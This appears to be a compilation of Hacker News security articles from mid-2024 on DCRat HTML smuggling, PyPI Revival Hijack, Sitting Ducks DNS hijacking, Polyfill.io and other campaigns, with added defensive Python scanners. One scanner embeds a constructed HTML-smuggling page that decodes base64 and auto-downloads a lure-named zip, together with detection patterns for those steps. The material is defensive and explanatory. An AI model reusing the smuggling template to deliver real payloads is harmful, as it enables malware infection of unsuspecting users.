New HTML Smuggling Campaign Delivers DCRat Malware to Russian-Speaking Users
27.9.24 Hacking The Hacker News
Russian-speaking users have been targeted as part of a new campaign distributing a commodity trojan called DCRat (aka DarkCrystal RAT) by means of a technique known as HTML smuggling.
The development marks the first time the malware has been deployed using this method, a departure from previously observed delivery vectors such as compromised or fake websites, or phishing emails bearing PDF attachments or macro-laced Microsoft Excel documents.
"HTML smuggling is primarily a payload delivery mechanism," Netskope researcher Nikhil Hegde said in an analysis published Thursday. "The payload can be embedded within the HTML itself or retrieved from a remote resource."
The HTML file, in turn, can be propagated via bogus sites or malspam campaigns. Once the file is launched via the victim's web browser, the concealed payload is decoded and downloaded onto the machine.
The attack subsequently banks on some level of social engineering to convince the victim to open the malicious payload.
Netskope said it discovered HTML pages mimicking TrueConf and VK in the Russian language that, when opened in a web browser, automatically download a password-protected ZIP archive to disk in an attempt to evade detection. The ZIP payload contains a nested RarSFX archive that ultimately leads to the deployment of the DCRat malware.
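A scanner for the decode-and-download pattern just described, as an added example that is not Netskope's code: it flags the JavaScript building blocks of HTML smuggling and decodes any large base64 literal to check for an archive or executable signature. The sample page and the payload blob are constructed.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# Constructed payload stub: bytes starting with the zip signature, base64-encoded
# (not a real archive and not the campaign's file).
PAYLOAD_B64 = base64.b64encode(b"PK\x03\x04" + b"\x00" * 60).decode()

# Constructed page imitating the pattern above: decode in the browser, wrap in a Blob,
# force a download with a lure filename. Hypothetical, not a sample from the campaign.
SAMPLE_HTML = """<html><body><p>TrueConf</p>
<script>
var b64 = "__B64__";
var bin = atob(b64);
var bytes = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) { bytes[i] = bin.charCodeAt(i); }
var blob = new Blob([bytes], {type: "application/octet-stream"});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "TrueConf_update.zip";
a.click();
</script></body></html>""".replace("__B64__", PAYLOAD_B64)

BENIGN_HTML = "<html><body><h1>Hello</h1><script>console.log('hi');</script></body></html>"

# JavaScript building blocks that smuggling pages tend to combine.
JS_INDICATORS = {
    "atob": re.compile(r"\batob\s*\("),
    "blob": re.compile(r"new\s+Blob\s*\("),
    "object_url": re.compile(r"createObjectURL\s*\("),
    "ms_save": re.compile(r"msSaveOrOpenBlob\s*\("),
    "download": re.compile(r"\.download\s*=|\bdownload\s*=\s*[\"']"),
    "auto_click": re.compile(r"\.click\s*\(\s*\)"),
}
MIN_B64_CHARS = 64  # ignore short literals such as class names or tiny icons
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{%d,}={0,2})[\"']" % MIN_B64_CHARS)
MAGIC = {b"PK\x03\x04": "zip", b"Rar!": "rar", b"MZ": "pe", b"%PDF": "pdf", b"\x7fELF": "elf"}


def classify_blob(b64: str) -> Optional[Tuple[str, int]]:
    """Decode a base64 literal and name the file type by its signature; None if not base64."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    for magic, kind in MAGIC.items():
        if raw.startswith(magic):
            return kind, len(raw)
    return "unknown", len(raw)


def scan_html(html: str) -> Dict[str, object]:
    """Score a page: one point per JS indicator, two more if an embedded blob is an archive/executable."""
    hits = {name: bool(rx.search(html)) for name, rx in JS_INDICATORS.items()}
    blobs: List[Dict[str, object]] = []
    for m in B64_LITERAL.finditer(html):
        info = classify_blob(m.group(1))
        if info:
            blobs.append({"kind": info[0], "size": info[1]})
    score = sum(hits.values()) + (2 if any(b["kind"] != "unknown" for b in blobs) else 0)
    return {"indicators": hits, "blobs": blobs, "score": score, "suspicious": score >= 4}


if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        print(label, scan_html(page))
```

Run it over mail attachments or proxy-captured HTML; a decoded blob with a zip or RarSFX signature next to a forced download is the combination worth alerting on.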
First released in 2018, DCRat is capable of functioning as a full-fledged backdoor that can be paired with additional plugins to extend its functionality. It can execute shell commands, log keystrokes, and exfiltrate files and credentials, among others.
Organizations are recommended to review HTTP and HTTPS traffic to ensure that systems are not communicating with malicious domains.
The development comes as Russian companies have been targeted by a threat cluster dubbed Stone Wolf to infect them with Meduza Stealer by sending phishing emails masquerading as a legitimate provider of industrial automation solutions.
"Adversaries continue to use archives with both malicious files and legitimate attachments which serve to distract the victim," BI.ZONE said. "By using the names and data of real organizations, attackers have a greater chance to trick their victims into downloading and opening malicious attachments."
It also follows the emergence of malicious campaigns that have likely leveraged generative artificial intelligence (GenAI) to write VBScript and JavaScript code responsible for spreading AsyncRAT via HTML smuggling.
"The scripts' structure, comments and choice of function names and variables were strong clues that the threat actor used GenAI to create the malware," HP Wolf Security said. "The activity shows how GenAI is accelerating attacks and lowering the bar for cybercriminals to infect endpoints."
Researchers Find Over 22,000 Removed PyPI Packages at Risk of Revival Hijack
5.9.24 Hacking The Hacker News
A new supply chain attack technique targeting the Python Package Index (PyPI) registry has been exploited in the wild in an attempt to infiltrate downstream organizations.
It has been codenamed Revival Hijack by software supply chain security firm JFrog, which said the attack method could be used to hijack 22,000 existing PyPI packages and result in "hundreds of thousands" of malicious package downloads. These susceptible packages have more than 100,000 downloads or have been active for over six months.
"This attack technique involves hijacking PyPI software packages by manipulating the option to re-register them once they're removed from PyPI's index by the original owner," JFrog security researchers Andrey Polkovnychenko and Brian Moussalli said in a report shared with The Hacker News.
At its core, the attack hinges on the fact that Python packages published in the PyPI repository may get removed, making available the names of those deleted projects for registration to any other user.
Statistics shared by JFrog show that about 309 packages are removed each month on average. Packages are removed for any number of reasons: lack of maintenance (i.e., abandonware), re-publication under a different name, or the same functionality being folded into official libraries or built-in APIs.
This also poses a lucrative attack surface that's more effective than typosquatting and which an attacker, using their own accounts, could exploit to publish malicious packages under the same name and a higher version to infect developer environments.
"The technique does not rely on the victim making a mistake when installing the package," the researchers said, pointing out how Revival Hijack can yield better results from the point of view of an adversary. "Updating a 'once safe' package to its latest version is viewed as a safe operation by many users."
While PyPI does have safeguards in place against author impersonation and typosquatting attempts, JFrog's analysis found that running the "pip list --outdated" command lists the counterfeit package as a new version of the original package, wherein the former corresponds to a different package from an entirely different author.
Even more concerning, running the "pip install --upgrade" command replaces the actual package with the phony one without so much as a warning that the package's author has changed, potentially exposing unwitting developers to a huge software supply chain risk.
JFrog said it took the step of creating a new PyPI user account called "security_holding" that it used to safely hijack the susceptible packages and replace them with empty placeholders so as to prevent malicious actors from capitalizing on the removed packages.
Additionally, each of these packages has been assigned the version number 0.0.0.1 – the opposite of a dependency confusion attack scenario – so that it is not pulled in when developers run a pip upgrade command.
What's more disturbing is that Revival Hijack has already been exploited in the wild, with an unknown threat actor called Jinnis introducing a benign version of a package named "pingdomv3" on March 30, 2024, the same day the original owner (cheneyyan) removed the package from PyPI.
On April 12, 2024, the new developer is said to have released an update containing a Base64-encoded payload that checks for the presence of the "JENKINS_URL" environment variable, and if present, executes an unknown next-stage module retrieved from a remote server.
"This suggests that the attackers either delayed the delivery of the attack or designed it to be more targeted, possibly limiting it to a specific IP range," JFrog said.
The new attack is a sign that threat actors are eyeing supply chain attacks on a broader scale by targeting deleted PyPI packages in order to expand the reach of the campaigns. Organizations and developers are recommended to inspect their DevOps pipelines to ensure that they are not installing packages that have been already removed from the repository.
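An audit of the kind the recommendation above calls for, as an added example that is not JFrog's code or tooling: it reads `pip list --outdated --format=json` output and flags Revival Hijack warning signs against constructed index snapshots shaped like the PyPI JSON API. The package names, authors and the `fetch_from_snapshot` stand-in are assumptions.

```python
import json
from typing import Callable, Dict, List

# Constructed stand-in for the output of `pip list --outdated --format=json` (the command
# and its JSON keys are real; the package names and versions here are made up).
OUTDATED_JSON = json.dumps([
    {"name": "examplepkg", "version": "1.4.2", "latest_version": "1.4.3", "latest_filetype": "wheel"},
    {"name": "oldtool", "version": "2.0.0", "latest_version": "2.0.1", "latest_filetype": "wheel"},
])

# Constructed record of who maintained each dependency when it was first approved for use.
VETTED = {
    "examplepkg": {"author": "alice"},
    "oldtool": {"author": "bob"},
}

# Constructed index snapshots shaped like the PyPI JSON API (`info.author`, `info.version`
# and `releases` are real keys; the contents are made up). `examplepkg` models a revived
# name: the original project was deleted and re-registered, so the vetted 1.4.2 is gone
# from its release history and the latest release comes from someone else.
INDEX = {
    "examplepkg": {
        "info": {"author": "mallory", "version": "1.4.3"},
        "releases": {"1.4.3": [{"upload_time": "2024-04-12T10:00:00"}]},
    },
    "oldtool": {
        "info": {"author": "bob", "version": "2.0.1"},
        "releases": {
            "2.0.0": [{"upload_time": "2023-01-05T09:00:00"}],
            "2.0.1": [{"upload_time": "2024-08-01T09:00:00"}],
        },
    },
}


def fetch_from_snapshot(name: str) -> dict:
    """Stand-in for fetching https://pypi.org/pypi/<name>/json; reads the constructed snapshot."""
    return INDEX[name]


def audit_package(entry: dict, vetted: Dict[str, dict], fetch: Callable[[str], dict]) -> List[str]:
    """Return the Revival Hijack warning signs for one `pip list --outdated` entry."""
    name, installed = entry["name"], entry["version"]
    meta = fetch(name)
    reasons = []
    # Sign 1: the version we run is no longer in the index history. A deleted-and-re-registered
    # project starts with an empty history, so the old releases simply vanish.
    if installed not in meta["releases"]:
        reasons.append(f"installed version {installed} is missing from the index history")
    # Sign 2: the latest release is attributed to someone other than the vetted maintainer.
    # pip itself never surfaces this; an upgrade would silently replace the package.
    vetted_author = vetted.get(name, {}).get("author")
    current_author = meta["info"].get("author")
    if vetted_author and current_author != vetted_author:
        reasons.append(f"author changed from {vetted_author!r} to {current_author!r}")
    return reasons


def audit_outdated(outdated_json: str, vetted: Dict[str, dict],
                   fetch: Callable[[str], dict] = fetch_from_snapshot) -> Dict[str, List[str]]:
    """Map package name -> warning signs; packages with no signs are omitted."""
    findings = {}
    for entry in json.loads(outdated_json):
        reasons = audit_package(entry, vetted, fetch)
        if reasons:
            findings[entry["name"]] = reasons
    return findings


if __name__ == "__main__":
    for pkg, why in audit_outdated(OUTDATED_JSON, VETTED).items():
        print(f"HOLD upgrade of {pkg}: {'; '.join(why)}")
```

In a pipeline, swap `fetch_from_snapshot` for a function that fetches the real JSON endpoint and gate the upgrade step on an empty result.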
"Using a vulnerable behavior in the handling of removed packages allowed attackers to hijack existing packages, making it possible to install it to the target systems without any changes to the user's workflow," said Moussalli, JFrog Security Research Team Lead.
"The PyPI package attack surface is continually growing. Despite proactive intervention here, users should always stay vigilant and take the necessary precautions to protect themselves and the PyPI community from this hijack technique."
Over 1 Million Domains at Risk of 'Sitting Ducks' Domain Hijacking Technique
1.8.24 Hacking The Hacker News
Over a million domains are susceptible to takeover by malicious actors by means of what has been called a Sitting Ducks attack.
The powerful attack vector, which exploits weaknesses in the domain name system (DNS), is being exploited by over a dozen Russian-nexus cybercriminal actors to stealthily hijack domains, a joint analysis published by Infoblox and Eclypsium has revealed.
"In a Sitting Ducks attack, the actor hijacks a currently registered domain at an authoritative DNS service or web hosting provider without accessing the true owner's account at either the DNS provider or registrar," the researchers said.
"Sitting Ducks is easier to perform, more likely to succeed, and harder to detect than other well-publicized domain hijacking attack vectors, such as dangling CNAMEs."
Once a domain has been taken over by the threat actor, it could be used for all kinds of nefarious activities, including serving malware and sending spam, while abusing the trust associated with the legitimate owner.
Details of the "pernicious" attack technique were first documented by The Hacker Blog in 2016, although it remains largely unknown and unresolved to date. More than 35,000 domains are estimated to have been hijacked since 2018.
"It is a mystery to us," Dr. Renee Burton, vice president of threat intelligence at Infoblox, told The Hacker News. "We frequently receive questions from prospective clients, for example, about dangling CNAME attacks which are also a hijack of forgotten records, but we have never received a question about a Sitting Ducks hijack."
At issue is the incorrect configuration at the domain registrar and the authoritative DNS provider, coupled with the fact that the nameserver is unable to respond authoritatively for a domain it's listed to serve (i.e., lame delegation).
It also requires that the authoritative DNS provider is exploitable, permitting the attacker to claim ownership of the domain at the delegated authoritative DNS provider while not having access to the valid owner's account at the domain registrar.
In such a scenario, should the authoritative DNS service for the domain expire, the threat actor could create an account with the provider and claim ownership of the domain, ultimately impersonating the brand behind the domain to distribute malware.
"There are many variations [of Sitting Ducks], including when a domain has been registered, delegated, but not configured at the provider," Burton said.
The Sitting Ducks attack has been weaponized by different threat actors, with the stolen domains used to fuel multiple traffic distribution systems (TDSes) such as 404 TDS (aka Vacant Viper) and VexTrio Viper. It has also been leveraged to propagate bomb threat hoaxes and sextortion scams.
"Organizations should check the domains they own to see if any are lame and they should use DNS providers that have protection against Sitting Ducks," Burton said.
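A check for the lame-delegation precondition described above, as an added example that is not Infoblox's or Eclypsium's tooling: it sends an SOA query straight to a delegated nameserver using only the standard library and treats anything but an authoritative answer as lame. The sample response bytes are constructed; `check_nameserver` needs network access and the delegated servers' IP addresses.

```python
import socket
import struct
from typing import Dict, List

RCODES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN", 4: "NOTIMP", 5: "REFUSED"}
QTYPE_SOA = 6
TXID = 0x1234


def build_query(name: str, qtype: int = QTYPE_SOA, txid: int = TXID) -> bytes:
    """Minimal DNS query with RD=0, so the server must answer from its own zone data."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)  # QR=0, RD=0, one question
    labels = name.rstrip(".").split(".")
    qname = b"".join(bytes([len(lab)]) + lab.encode("ascii") for lab in labels) + b"\x00"
    return header + qname + struct.pack(">HH", qtype, 1)  # class IN


def parse_response(resp: bytes) -> Dict[str, object]:
    """Extract the header fields a lameness check needs (AA flag, RCODE, answer count)."""
    if len(resp) < 12:
        raise ValueError("truncated DNS response")
    txid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", resp[:12])
    return {"id": txid, "aa": bool(flags & 0x0400),
            "rcode": RCODES.get(flags & 0x000F, "OTHER"), "ancount": an}


def classify(parsed: Dict[str, object]) -> str:
    """A delegated server is healthy only if it answers the zone's SOA query authoritatively."""
    if parsed["rcode"] == "NOERROR" and parsed["aa"] and parsed["ancount"] > 0:
        return "authoritative"
    # REFUSED/SERVFAIL (the zone is unknown to this provider) and non-authoritative NOERROR
    # replies all mean the delegation is lame: the Sitting Ducks precondition.
    return "lame"


def check_nameserver(domain: str, ns_ip: str, timeout: float = 3.0) -> str:
    """Query one delegated nameserver directly over UDP and classify its answer (needs network)."""
    query = build_query(domain)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(query, (ns_ip, 53))
        try:
            data, _ = sock.recvfrom(4096)
        except socket.timeout:
            return "no-response"
    parsed = parse_response(data)
    if parsed["id"] != TXID:
        return "no-response"  # not an answer to our query
    return classify(parsed)


def check_domain(domain: str, ns_ips: List[str]) -> Dict[str, str]:
    """Classify every delegated server; the domain needs attention if any of them is lame."""
    return {ip: check_nameserver(domain, ip) for ip in ns_ips}


# Constructed responses (header only, which is all classify() reads) for offline use.
SAMPLE_REFUSED = struct.pack(">HHHHHH", TXID, 0x8005, 1, 0, 0, 0)        # QR=1, RCODE=5 REFUSED
SAMPLE_AUTHORITATIVE = struct.pack(">HHHHHH", TXID, 0x8400, 1, 1, 0, 0)  # QR=1, AA=1, one answer
SAMPLE_NONAUTH = struct.pack(">HHHHHH", TXID, 0x8080, 1, 0, 0, 0)        # QR=1, RA=1, AA=0: not serving the zone

if __name__ == "__main__":
    import sys
    # usage: python lame_check.py example.com 192.0.2.1 192.0.2.2  (IPs of the delegated nameservers)
    print(check_domain(sys.argv[1], sys.argv[2:]))
```

Take the nameserver list from the registrar's delegation (the parent zone's NS records), not from the provider, since the mismatch between the two is exactly what the attack exploits.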
Patchwork Hackers Target Bhutan with Advanced Brute Ratel C4 Tool
25.7.24 Hacking The Hacker News
The threat actor known as Patchwork has been linked to a cyber attack targeting entities with ties to Bhutan to deliver the Brute Ratel C4 framework and an updated version of a backdoor called PGoShell.
The development marks the first time the adversary has been observed using the red teaming software, the Knownsec 404 Team said in an analysis published last week.
The activity cluster, also called APT-C-09, Dropping Elephant, Operation Hangover, Viceroy Tiger, and Zinc Emerson, is a state-sponsored actor likely of Indian origin.
Known for conducting spear-phishing and watering hole attacks against China and Pakistan, the hacking crew is believed to have been active since at least 2009, according to data shared by Chinese cybersecurity firm QiAnXin.
Last July, Knownsec 404 disclosed details of an espionage campaign aimed at universities and research organizations in China that leveraged a .NET-based implant codenamed EyeShell to fetch and execute commands from an attacker-controlled server, run additional payloads, and capture screenshots.
Then earlier this February, it was found that the threat actor had employed romance-themed lures to ensnare victims in Pakistan and India and compromise their Android devices with a remote access trojan dubbed VajraSpy.
The starting point of the latest observed attack chain is a Windows shortcut (LNK) file that's designed to download a decoy PDF document from a remote domain impersonating the UNFCCC-backed Adaptation Fund, while stealthily deploying Brute Ratel C4 and PGoShell retrieved from a different domain ("beijingtv[.]org").
"PGoShell is developed in the Go programming language; overall, it offers a rich set of functionalities, including remote shell capabilities, screen capture, and downloading and executing payloads," the cybersecurity company said.
The development comes months after APT-K-47 – another threat actor sharing tactical overlaps with SideWinder, Patchwork, Confucius, and Bitter – was attributed to attacks involving the use of ORPCBackdoor as well as previously undocumented malware like WalkerShell, DemoTrySpy, and NixBackdoor to harvest data and execute shellcode.
The attacks are also notable for deploying an open-source command-and-control (C2) framework known as Nimbo-C2, which "enables a wide range of remote control functionalities," Knownsec 404 said.
Experts Uncover Chinese Cybercrime Network Behind Gambling and Human Trafficking
23.7.24 Hacking The Hacker News
[Figure: The relationship between various TDSs and DNS associated with Vigorish Viper and the final landing experience for the user]
A Chinese organized crime syndicate with links to money laundering and human trafficking across Southeast Asia has been using an advanced "technology suite" that runs the whole cybercrime supply chain spectrum to spearhead its operations.
Infoblox is tracking the proprietor and maintainer under the moniker Vigorish Viper, noting that it's developed by the Yabo Group (aka Yabo Sports), which has been linked to illegal gambling operations and pig butchering scams in the past. In late 2022, it rebranded as Kaiyun Sports and has since been absorbed into another newly formed entity called Ponymuah.
The suite, marketed in China as "baowang" ("包网," meaning full package) encompasses several components such as Domain Name System (DNS) configurations, website hosting, payment mechanisms, advertising, and mobile apps. It also hosts thousands of domain names and numerous brands in an infrastructure that's tied to Hong Kong and China.
The enterprise hinges on securing European football club sponsorships using front companies or white label brands, and using them as a "force multiplier" to advertise illegal gambling sites in the region with the goal of attracting more bettors. In July 2023, it was reported that betting company logos appeared as often as 3,500 times during the course of a televised football match.
Yabo, Ponymuah, and other related offshoots like OB (aka OBGM), DB Gaming, Panda Sports, KM Gaming, and Smart King Games (SKG) are all part of Vigorish Viper's sprawling network, highlighting the tangled and murky ownership of the gambling companies and the painstaking steps undertaken to sidestep scrutiny.
It's not just English football clubs that have engaged in these sponsorships, as the investigation has unearthed that cricket and kabaddi teams in India have also entered into similar sponsorship agreements to advertise Vigorish Viper brands.
"Vigorish Viper operates a vast network of over 170,000 active domain names, evading detection and law enforcement through its sophisticated use of DNS CNAME traffic distribution systems," Infoblox researchers Maël Le Touz, Jacques Portal, Renée Burton, and Elena Puga said in an exhaustive report shared with The Hacker News.
"In addition to gambling, Vigorish Viper's CNAME [traffic distribution systems] serve illegal streaming and pornography sites. Some of the domains used for streaming are long-registered domains that Vigorish Viper picked up after the original registration expired."
Burton, vice president of threat intelligence at Infoblox, described the threat actor as "one of the most sophisticated and important threats to digital security" discovered to date.
[Figure: An overview of Vigorish Viper's sports sponsorship scheme]
"Vigorish Viper created a complex infrastructure with multiple layers of traffic distribution systems (TDSs) using DNS CNAME records and JavaScript, which makes it incredibly difficult to detect," Burton said in a statement. "These systems are complemented by their own encrypted communications and custom-developed applications, making their activities not only elusive but also remarkably resilient."
This entails the use of DNS CNAME records to redirect traffic from one domain through another, a technique previously adopted by other DNS threat actors like Savvy Seahorse. Furthermore, the system has the capability to differentiate between residential, mobile, and commercial IP addresses in China.
Earlier this January, the Danish Institute for Sports Studies' Play the Game initiative uncovered connections between dozens of European football clubs and illegal gambling brands that can be traced back to Yabo and target jurisdictions like China where gambling is prohibited and considered an organized crime.
The online crimes also have an offline aspect involving human trafficking wherein people are lured with the promise of high-paying jobs and are coerced into supporting sports betting schemes and promoting pig butchering scams and other cryptocurrency scams, according to the Asian Racing Federation (ARF).
"Operating in teams of 8-10, some coordinate with commentators and broadcasters of live sport (presumably on pirate streams) to promote live chat groups marketing betting websites during games," according to a report [PDF] released by the ARF in October 2023. "Others act as relationship managers to encourage customers to continue betting and others as direct customer recruitment agents."
[Figure: Steps between when a user visits a site and starts placing bets]
Infoblox said its own investigation into Vigorish Viper stemmed from a single anomalous domain, kb[.]com – a gambling site named KB Sports that uses Chinese nameservers – which also hosts yabo[.]com, the domain name for Yabo Sports.
An interesting aspect to note here is that the website is geo-blocked to users located in France and elsewhere in Europe, but is accessible from mainland China and the special administrative regions of Hong Kong and Macau.
"When visited from one of those areas, the user is redirected to another domain — for example, kb830[.]com," the researchers pointed out. "The redirection domain changes over time. Additionally, all 'right click' functionality is disabled on the site, as is text selection, hindering efforts to investigate or copy the site."
Users to the website are then served ads promoting financial incentives for betting regularly, alongside options to pay using WeChat Pay, EBpay, Alipay, JD Pay, KOIPay, AstroPay, YunShanFu, UniPay, Net Pay, Fast Pay, and NetBank. The betting takes place through agents, who place the bets, manage the deposits, and communicate with gamblers through bespoke, encrypted chat apps.
A deeper examination of the DNS query logs has also unearthed evidence that Vigorish Viper's activities transcend China to target users across the world.
Other defense mechanisms built into these sites include periodic checks for signs of automated activity and CAPTCHA puzzles served to visitors, in an attempt to defeat scanning efforts, as well as when a visitor tries to reach customer support, a task carried out by real people who have been trafficked into Southeast Asia.
That's not all. Users visiting one of Vigorish Viper's brand domains are subjected to multiple rounds of fingerprinting checks to validate that the IP address is in China and they are legitimate, before they are allowed to bet on the sites.
"Both the DNS and the software tie Vigorish Viper's entire enterprise to Yabo Sports or Yabo Group," the company said. "Their reach extends to dozens of brands, possibly hundreds, and targets users beyond Southeast Asia."
"In spite of the massive number of domain names, websites, and accompanying applications, along with overt presence in the public eye, Vigorish Viper is operating directly and inexplicably in the PRC without meaningful consequence."
GitHub Token Leak Exposes Python's Core Repositories to Potential Attacks
16.7.24 Hacking The Hacker News
Cybersecurity researchers said they discovered an accidentally leaked GitHub token that could have granted elevated access to the GitHub repositories of the Python language, Python Package Index (PyPI), and the Python Software Foundation (PSF) repositories.
JFrog, which found the GitHub Personal Access Token, said the secret was leaked in a public Docker container hosted on Docker Hub.
"This case was exceptional because it is difficult to overestimate the potential consequences if it had fallen into the wrong hands – one could supposedly inject malicious code into PyPI packages (imagine replacing all Python packages with malicious ones), and even to the Python language itself," the software supply chain security company said.
An attacker could have hypothetically weaponized their admin access to orchestrate a large-scale supply chain attack by poisoning the source code associated with the core of the Python programming language, or the PyPI package manager.
JFrog noted that the authentication token was found inside a Docker container, in a compiled Python file ("build.cpython-311.pyc") that was inadvertently not cleaned up.
Following responsible disclosure on June 28, 2024, the token – which was issued for the GitHub account linked to PyPI Admin Ee Durbin – was immediately revoked. There is no evidence that the secret was exploited in the wild.
PyPI said the token was issued sometime prior to March 3, 2023, and that the exact date is unknown due to the fact that security logs are unavailable beyond 90 days.
"While developing cabotage-app5 locally, working on the build portion of the codebase, I was consistently running into GitHub API rate limits," Durbin explained.
"These rate limits apply to anonymous access. While in production the system is configured as a GitHub App, I modified my local files to include my own access token in an act of laziness, rather than configure a localhost GitHub App. These changes were never intended to be pushed remotely."
The disclosure comes as Checkmarx uncovered a series of malicious packages on PyPI that are designed to exfiltrate sensitive information to a Telegram bot without victims' consent or knowledge.
The packages in question – testbrojct2, proxyfullscraper, proxyalhttp, and proxyfullscrapers – work by scanning the compromised system for files matching extensions like .py, .php, .zip, .png, .jpg, and .jpeg.
"The Telegram bot is linked to multiple cybercriminal operations based in Iraq," Checkmarx researcher Yehuda Gelb said, noting the bot's message history dates all the way back to 2022.
"The bot functions also as an underground marketplace offering social media manipulation services. It has been linked to financial theft and exploits victims by exfiltrating their data."
CRYSTALRAY Hackers Infect Over 1,500 Victims Using Network Mapping Tool
15.7.24 Hacking The Hacker News
A threat actor that was previously observed using an open-source network mapping tool has greatly expanded their operations to infect over 1,500 victims.
Sysdig, which is tracking the cluster under the name CRYSTALRAY, said the activities have witnessed a 10x surge, adding it includes "mass scanning, exploiting multiple vulnerabilities, and placing backdoors using multiple [open-source software] security tools."
The primary objective of the attacks is to harvest and sell credentials, deploy cryptocurrency miners, and maintain persistence in victim environments.
Prominent among the open-source programs used by the threat actor is SSH-Snake, which was first released in January 2024. It has been described as a tool to carry out automatic network traversal using SSH private keys discovered on systems.
The abuse of the software by CRYSTALRAY was documented by the cybersecurity company earlier this February, with the tool deployed for lateral movement following the exploitation of known security flaws in public-facing Apache ActiveMQ and Atlassian Confluence instances.
Joshua Rogers, the developer behind SSH-Snake told The Hacker News at the time that the tool only automates what would have been otherwise manual steps, and called on companies to "discover the attack paths that exist – and fix them."
Some of the other tools employed by the attackers include asn, zmap, httpx, and nuclei in order to check if a domain is active and launch scans for vulnerable services such as Apache ActiveMQ, Apache RocketMQ, Atlassian Confluence, Laravel, Metabase, Openfire, Oracle WebLogic Server, and Solr.
CRYSTALRAY also weaponizes its initial foothold to conduct a wide-ranging credential discovery process that goes beyond moving between servers accessible via SSH. Persistent access to the compromised environment is accomplished by means of a legitimate command-and-control (C2) framework called Sliver and a reverse shell manager codenamed Platypus.
In a further bid to derive monetary value from the infected assets, cryptocurrency miner payloads are delivered to illicitly use the victim resources for financial gain, while simultaneously taking steps to terminate competing miners that may have already been running on the machines.
"CRYSTALRAY is able to discover and extract credentials from vulnerable systems, which are then sold on black markets for thousands of dollars," Sysdig researcher Miguel Hernández said. "The credentials being sold involve a multitude of services, including Cloud Service Providers and SaaS email providers."
Polyfill[.]io Attack Impacts Over 380,000 Hosts, Including Major Companies
5.7.24 Hacking The Hacker News
The supply chain attack targeting the widely used Polyfill[.]io JavaScript library is wider in scope than previously thought, with new findings from Censys showing that over 380,000 hosts are embedding a polyfill script linking to the malicious domain as of July 2, 2024.
This includes references to "https://cdn.polyfill[.]io" or "https://cdn.polyfill[.]com" in their HTTP responses, the attack surface management firm said.
"Approximately 237,700 are located within the Hetzner network (AS24940), primarily in Germany," it noted. "This is not surprising – Hetzner is a popular web hosting service, and many website developers leverage it."
Further analysis of the affected hosts has revealed domains tied to prominent companies like WarnerBros, Hulu, Mercedes-Benz, and Pearson that reference the malicious endpoint in question. Details of the attack emerged in late June 2024 when Sansec alerted that code hosted on the Polyfill domain had been modified to redirect users to adult- and gambling-themed websites. The code changes were made such that the redirections only took place at certain times of the day and only against visitors who met certain criteria.
The nefarious behavior is said to have been introduced after the domain and its associated GitHub repository were sold to a Chinese company named Funnull in February 2024.
The development has since prompted domain registrar Namecheap to suspend the domain, content delivery networks such as Cloudflare to automatically replace Polyfill links with domains leading to alternative safe mirror sites, and Google to block ads for sites embedding the domain.
While the operators attempted to relaunch the service under a different domain named polyfill[.]com, it was also taken down by Namecheap as of June 28, 2024. Of the two other domains registered by them since the start of July – polyfill[.]site and polyfillcache[.]com – the latter remains up and running.
On top of that, a more extensive network of potentially related domains, including bootcdn[.]net, bootcss[.]com, staticfile[.]net, staticfile[.]org, unionadjs[.]com, xhsbpza[.]com, union.macoms[.]la, newcrbpc[.]com, has been uncovered as tied to the maintainers of Polyfill, indicating that the incident might be part of a broader malicious campaign.
"One of these domains, bootcss[.]com, has been observed engaging in malicious activities that are very similar to the polyfill[.]io attack, with evidence dating back to June 2023," Censys noted, adding it discovered 1.6 million public-facing hosts that link to these suspicious domains.
"It wouldn't be entirely unreasonable to consider the possibility that the same malicious actor responsible for the polyfill.io attack might exploit these other domains for similar activities in the future."
The development comes as WordPress security company Patchstack warned of cascading risks posed by the Polyfill supply chain attack on sites running the content management system (CMS) through dozens of legitimate plugins that link to the rogue domain.
Israeli Entities Targeted by Cyberattack Using Donut and Sliver Frameworks
3.7.24 Hacking The Hacker News
Cybersecurity researchers have discovered an attack campaign that targets various Israeli entities with publicly-available frameworks like Donut and Sliver.
The campaign, believed to be highly targeted in nature, "leverage target-specific infrastructure and custom WordPress websites as a payload delivery mechanism, but affect a variety of entities across unrelated verticals, and rely on well-known open-source malware," HarfangLab said in a report last week.
The French company is tracking the activity under the name Supposed Grasshopper. It's a reference to an attacker-controlled server ("auth.economy-gov-il[.]com/SUPPOSED_GRASSHOPPER.bin") to which a first-stage downloader connects.
This downloader, written in Nim, is rudimentary and is tasked with downloading the second-stage malware from the staging server. It's delivered by means of a virtual hard disk (VHD) file that's suspected to be propagated via custom WordPress sites as part of a drive-by download scheme.
The second-stage payload retrieved from the server is Donut, a shellcode generation framework, which serves as a conduit for deploying an open-source Cobalt Strike alternative called Sliver.
"The operators also put some notable efforts in acquiring dedicated infrastructure and deploying a realistic WordPress website to deliver payloads," the researchers said. "Overall, this campaign feels like it could realistically be the work of a small team."
The end goal of the campaign is currently unknown, although HarfangLab theorized that it could also be associated with a legitimate penetration testing operation, a possibility that raises its own set of questions surrounding transparency and the need for impersonating Israeli government agencies.
The disclosure comes as the SonicWall Capture Labs threat research team detailed an infection chain that employs booby-trapped Excel spreadsheets as a starting point to drop a trojan known as Orcinius.
"This is a multi-stage trojan that is using Dropbox and Google Docs to download second-stage payloads and stay updated," the company said. "It contains an obfuscated VBA macro that hooks into Windows to monitor running windows and keystrokes and creates persistence using registry keys."
Australian Man Charged for Fake Wi-Fi Scam on Domestic Flights
2.7.24 Hacking The Hacker News
An Australian man has been charged with running a fake Wi-Fi access point during a domestic flight with an aim to steal user credentials and data.
The unnamed 42-year-old "allegedly established fake free Wi-Fi access points, which mimicked legitimate networks, to capture personal data from unsuspecting victims who mistakenly connected to them," the Australian Federal Police (AFP) said in a press release last week.
The agency said the suspect was charged in May 2024 after it launched an investigation a month earlier following a report from an airline about a suspicious Wi-Fi network identified by its employees during a domestic flight.
